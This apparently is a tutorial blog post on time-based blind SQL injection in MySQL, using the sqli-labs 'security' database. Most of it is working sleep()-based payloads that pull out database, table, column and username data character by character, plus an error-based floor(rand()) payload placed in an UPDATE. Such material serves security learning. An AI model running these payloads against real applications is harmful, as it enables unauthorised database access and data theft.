Time-Based Blind Injection

Author: 陈望_ning | Published 2018-12-20 15:05

    sleep() injection

    Getting the database name

    and sleep(if(ascii(substr(database(),1,1))<116,0,5)) %23
    and sleep(if(ascii(substr(database(),1,1))<115,0,5)) %23
    The first probe returns immediately and the second delays 5 seconds, so the ascii value of the first character is 115 (below 116, but not below 115). 115 is 's', so the database name starts with 's'. Move the substr() position to 2, 3, ... and repeat the comparisons to recover the rest of the name. (%23 is the URL-encoded '#', which comments out the remainder of the original query; when the comparison holds, if() returns 0 and sleep(0) comes back at once.)

    Getting table names

    and sleep(if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))<102,0,5)) %23
    and sleep(if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))<101,0,5)) %23
    102 returns immediately and 101 delays five seconds, so the first character of the first table name is ascii 101, 'e'. Change limit 0,1 to limit 1,1, limit 2,1, ... to query the other tables.

    Getting column names

    and sleep(if(ascii(substr((select column_name from information_schema.columns where table_name='users' and table_schema='security' limit 0,1),1,1))<106,0,5)) %23
    and sleep(if(ascii(substr((select column_name from information_schema.columns where table_name='users' and table_schema='security' limit 0,1),1,1))<105,0,5)) %23
    The delay gives the first letter of the first column name: ascii 105, 'i'. Move the substr() position to get the rest of that column name, and change the offset after limit to move on to the other columns.

    Getting values from the table

    and sleep(if(ascii(substring((select username from security.users limit 0,1),1,1))<69,0,5)) %23
    and sleep(if(ascii(substring((select username from security.users limit 0,1),1,1))<68,0,5)) %23
    The ascii value is 68, 'D'. Continue position by position to recover the whole username, and change the limit offset to move to the next row.

    if(condition,sleep(3),1)
    When the condition is true the query pauses for 3 seconds, otherwise it returns immediately.
    if(condition,1,sleep(3))
    When the condition is true the query returns immediately, otherwise it pauses for 3 seconds. The probes above fold both outcomes into one sleep(if(...,0,5)): a correct guess costs nothing, a wrong guess costs 5 seconds. Note that a sleep() placed in a WHERE clause is evaluated once per row the query examines, so the observed delay is the per-call delay multiplied by the number of matching rows; choose the delay and the timing threshold with that in mind.

    Original MySQL statement

    update user set password = 'admin' where password = (select 1 from (select count(*),(concat("",database(),"",floor(rand()*2))) name from information_schema.tables group by name)b);

    In the form

    and (select 1 from (select count(*),(concat("",database(),"",floor(rand()*2))) name from information_schema.tables group by name)b) #&submit=submit

    This last pair is not time-based; it is the floor(rand()*2) / group by error-based technique. Grouping on a key that contains rand() makes MySQL try to insert the same key twice and fail with a "Duplicate entry" error, and the error message contains the concatenated database() value, so the name is read from the error text rather than from a delay.

        Link to this article: https://www.haomeiwen.com/subject/cjsjkqtx.html